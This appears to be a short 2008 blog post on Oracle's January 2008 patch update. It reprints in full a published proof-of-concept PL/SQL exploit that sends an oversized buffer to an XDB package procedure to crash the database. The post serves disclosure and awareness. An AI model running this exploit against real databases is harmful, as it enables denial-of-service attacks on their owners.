Tuesday, February 05, 2008

Oracle DoS / Poc buffer overflow

Oracle released the January 2008 CPU (Critical Patch Update) patch as a bugfix for some of security bugs. One of the bugs solved in the January 2008 CPU. One of the fixes is for a DoS / Poc attack written by Alexandr Polyakov which can cause the database to crash.

The exploit is published on the milw0rm website and has the following code:

set serveroutput on
declare
buff varchar2(32767);
begin
/* generate evil buffer */
buff:='12345678901234567890123456789';
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||'0012345678901234567890123sh2kerr';
/* lets see the buffer size */
dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;


This is similar to the exploit Pete finnigan talked about in a post on his weblog in November 2007.


Post a Comment